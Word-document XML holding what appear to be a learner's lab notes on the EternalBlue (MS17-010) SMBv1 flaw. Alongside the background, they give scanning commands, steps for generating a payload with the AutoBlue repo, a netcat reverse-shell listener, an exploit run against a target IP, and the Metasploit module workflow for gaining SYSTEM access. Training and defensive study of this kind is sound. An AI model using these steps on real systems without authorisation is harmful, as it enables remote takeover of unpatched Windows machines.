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38D3" w14:textId="331216BC" w:rsidR="001F79F3" w:rsidRDefault="001F79F3">
      <w:r w:rsidRPr="001F79F3">
        <w:t xml:space="preserve">Vulnerability Analysis: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F79F3">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AADE2A6" w14:textId="77777777" w:rsidR="001F79F3" w:rsidRDefault="001F79F3"/>
    <w:p w14:paraId="59016C2D" w14:textId="257903E9" w:rsidR="002A5BEF" w:rsidRDefault="002A5BEF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ethernalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53BDAF" w14:textId="65D3F55E" w:rsidR="002A5BEF" w:rsidRDefault="002A5BEF">
      <w:r>
        <w:t>Allow attacker to remotely execute the arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB33536" w14:textId="3C4B38C3" w:rsidR="002A5BEF" w:rsidRDefault="003110F9">
      <w:r>
        <w:t xml:space="preserve">Provide </w:t>
      </w:r>
      <w:r w:rsidR="00380E7D">
        <w:t>elevated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587607E1" w14:textId="4E269F35" w:rsidR="003110F9" w:rsidRDefault="003740EF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003740EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003740EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS17-010)</w:t>
      </w:r>
      <w:r w:rsidRPr="003740EF">
        <w:t xml:space="preserve"> specifically exploits </w:t>
      </w:r>
      <w:r w:rsidRPr="003740EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMBv1</w:t>
      </w:r>
      <w:r w:rsidRPr="003740EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300FBEE0" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRPr="00380E7D" w:rsidRDefault="00380E7D" w:rsidP="00380E7D">
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve">It’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows SMB vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve"> discovered in 2017:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A53C4" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRPr="00380E7D" w:rsidRDefault="00380E7D" w:rsidP="00380E7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve">: MS17-010 (Microsoft’s patch ID) / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00380E7D">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve"> (exploit name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C6F79" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRPr="00380E7D" w:rsidRDefault="00380E7D" w:rsidP="00380E7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol affected</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMBv1</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve"> (Server Message Block version 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D7D08" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRPr="00380E7D" w:rsidRDefault="00380E7D" w:rsidP="00380E7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve">: Allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve"> without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565249FC" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRPr="00380E7D" w:rsidRDefault="00380E7D" w:rsidP="00380E7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Famous for</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve">: Being used in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WannaCry ransomware</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED3D96" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRPr="00380E7D" w:rsidRDefault="00380E7D" w:rsidP="00380E7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cause</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t>: Improper handling of specially crafted SMB packets by Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB09052" w14:textId="77777777" w:rsidR="00380E7D" w:rsidRDefault="00380E7D"/>
    <w:p w14:paraId="1103462D" w14:textId="49280E6C" w:rsidR="00866F90" w:rsidRDefault="00866F90">
      <w:r>
        <w:t>Autoblue-</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7D">
        <w:t>MS17-010</w:t>
      </w:r>
      <w:r w:rsidR="00005E51">
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r w:rsidR="003740EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB997F" w14:textId="15DDDDE2" w:rsidR="00005E51" w:rsidRDefault="00005E51">
      <w:r>
        <w:t>Exploit code or collection of script for testing vulnerability manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DB626" w14:textId="77777777" w:rsidR="00005E51" w:rsidRDefault="00005E51"/>
    <w:p w14:paraId="10224487" w14:textId="30B66D2E" w:rsidR="00866F90" w:rsidRDefault="00233F15">
      <w:r>
        <w:t>LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC97E52" w14:textId="2D851F80" w:rsidR="00233F15" w:rsidRDefault="00233F15">
      <w:r>
        <w:t xml:space="preserve">Sudo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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>445  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34FA1B27" w14:textId="1AA33AA0" w:rsidR="00233F15" w:rsidRDefault="00233F15"/>
    <w:p w14:paraId="4382844C" w14:textId="3A39BD7D" w:rsidR="00233F15" w:rsidRDefault="00233F15" w:rsidP="00233F15">
      <w:r>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r>
        <w:t>445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –script=smb-vuln-MS17-010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0135874C" w14:textId="7CD04056" w:rsidR="00233F15" w:rsidRDefault="003740EF" w:rsidP="00233F15">
      <w:r>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tells</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it is vulnerable or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8E18B" w14:textId="77777777" w:rsidR="003740EF" w:rsidRDefault="003740EF" w:rsidP="00233F15"/>
    <w:p w14:paraId="00EBCEC9" w14:textId="55F46F4B" w:rsidR="000D04DD" w:rsidRPr="000D04DD" w:rsidRDefault="000D04DD" w:rsidP="00233F15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D04DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manually performing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D04DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AD17F" w14:textId="4C410E49" w:rsidR="000D04DD" w:rsidRDefault="000D04DD" w:rsidP="00233F15">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="006B7260">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/3ndG4me/AutoBlue-MS17-010</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77E1A56C" w14:textId="77777777" w:rsidR="000D04DD" w:rsidRDefault="000D04DD" w:rsidP="00233F15"/>
    <w:p w14:paraId="6A9A7B8B" w14:textId="3135D24F" w:rsidR="00233F15" w:rsidRDefault="002727D0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">clone from this repo and after that check the requirement and set that hand after that move to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF1C16" w14:textId="5D82B50D" w:rsidR="002727D0" w:rsidRDefault="002727D0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x shell_prep.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD28EE" w14:textId="4C6A199A" w:rsidR="002727D0" w:rsidRDefault="002727D0">
      <w:r>
        <w:t>./shell_prep.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A9ADDA" w14:textId="43EB056E" w:rsidR="002727D0" w:rsidRDefault="002727D0">
      <w:r>
        <w:t>And set all the values accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A34162" w14:textId="59A0E8CB" w:rsidR="002727D0" w:rsidRDefault="002727D0">
      <w:r>
        <w:t xml:space="preserve">And at the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">end  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paylaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is generated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91A451" w14:textId="77777777" w:rsidR="002727D0" w:rsidRDefault="002727D0"/>
    <w:p w14:paraId="3E71C308" w14:textId="31271929" w:rsidR="002727D0" w:rsidRDefault="002727D0">
      <w:r>
        <w:t>Set listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D9B87" w14:textId="4082E465" w:rsidR="002727D0" w:rsidRDefault="002727D0">
      <w:r>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB02FE1" w14:textId="07A52D0E" w:rsidR="002727D0" w:rsidRDefault="00BA6DA3">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Cd .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> . # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> one place back </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD95D0" w14:textId="24242A5F" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>eternalblue_exploit7.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E47A27" w14:textId="6B2BB4F1" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3">
      <w:r>
        <w:t>Ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7730ECB9" w14:textId="1780A049" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3">
      <w:r>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:t>eternalblue_exploit7.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  /shellcode/sc_x64.bin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41F5DE55" w14:textId="65401A40" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3">
      <w:r>
        <w:t xml:space="preserve">After this we get the shell on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042CA55C" w14:textId="0CED5A76" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FA78DD1" w14:textId="77777777" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3"/>
    <w:p w14:paraId="7E1315EF" w14:textId="77777777" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3"/>
    <w:p w14:paraId="636131EB" w14:textId="0F0E3E42" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="000D04DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> performing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685DB285" w14:textId="47D7D272" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA6DA3">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E26DC8" w14:textId="0FAEC937" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:r>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D324E6B" w14:textId="50FD1AA2" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:r>
        <w:t>use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FB2D7" w14:textId="2DA07A87" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:r>
        <w:t>set all the options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236FE09" w14:textId="4A9DC89E" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAC378" w14:textId="14B837AA" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7147D2CF" w14:textId="1D82F644" w:rsidR="00BA6DA3" w:rsidRDefault="00833599" w:rsidP="00BA6DA3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46377012" w14:textId="77777777" w:rsidR="003A695F" w:rsidRDefault="003A695F" w:rsidP="00BA6DA3"/>
    <w:p w14:paraId="0AF404E9" w14:textId="77777777" w:rsidR="003A695F" w:rsidRDefault="003A695F" w:rsidP="003A695F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A695F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8DE2C" w14:textId="00D14AA4" w:rsidR="003A695F" w:rsidRPr="003A695F" w:rsidRDefault="003A695F" w:rsidP="003A695F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A695F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A695F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="003A695F">
        <w:t xml:space="preserve"> → Highest privileges on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A602AC8" w14:textId="3DC17085" w:rsidR="003A695F" w:rsidRPr="003A695F" w:rsidRDefault="003A695F" w:rsidP="003A695F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A695F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\LOCAL SERVICE</w:t>
      </w:r>
      <w:r w:rsidRPr="003A695F">
        <w:t xml:space="preserve"> → Limited local privileges, used for services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66560A9A" w14:textId="3056E9AD" w:rsidR="003A695F" w:rsidRPr="003A695F" w:rsidRDefault="003A695F" w:rsidP="003A695F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A695F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\NETWORK SERVICE</w:t>
      </w:r>
      <w:r w:rsidRPr="003A695F">
        <w:t xml:space="preserve"> → Limited privileges, can access the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16E58F" w14:textId="0DE1AEE2" w:rsidR="003A695F" w:rsidRPr="003A695F" w:rsidRDefault="003A695F" w:rsidP="00BA6DA3"/>
    <w:p w14:paraId="09CD2314" w14:textId="5506E7E4" w:rsidR="00833599" w:rsidRPr="00833599" w:rsidRDefault="00833599" w:rsidP="00FE096A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE096A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Staged payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00833599">
        <w:t>: Sends a small loader first, which then downloads/loads the full payload in stages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC77210" w14:textId="752A0197" w:rsidR="00833599" w:rsidRPr="00833599" w:rsidRDefault="00833599" w:rsidP="00FE096A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE096A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE096A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00833599">
        <w:t>: Sends the entire payload at once, no extra loading steps needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EAEC87" w14:textId="77777777" w:rsidR="00BA6DA3" w:rsidRPr="00BA6DA3" w:rsidRDefault="00BA6DA3" w:rsidP="00BA6DA3"/>
    <w:p w14:paraId="18BC4E0D" w14:textId="77777777" w:rsidR="00BA6DA3" w:rsidRDefault="00BA6DA3"/>
    <w:sectPr w:rsidR="00BA6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0632"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98602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4712E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C2A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97962"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9561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837262">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="469056876">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1624193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D0"/>
    <w:rsid w:val="00005E51"/>
    <w:rsid w:val="000D04DD"/>
    <w:rsid w:val="001F79F3"/>
    <w:rsid w:val="00233F15"/>
    <w:rsid w:val="002727D0"/>
    <w:rsid w:val="002A5BEF"/>
    <w:rsid w:val="003110F9"/>
    <w:rsid w:val="003227D0"/>
    <w:rsid w:val="003740EF"/>
    <w:rsid w:val="00380E7D"/>
    <w:rsid w:val="003A695F"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00563541"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00833599"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00866F90"/>
    <w:rsid w:val="00BA6DA3"/>
    <w:rsid w:val="00FE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E66E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6F4485A6-6251-4F76-825F-BD2B5064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7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4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A69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3ndG4me/AutoBlue-MS17-0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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-13T08:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-13T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>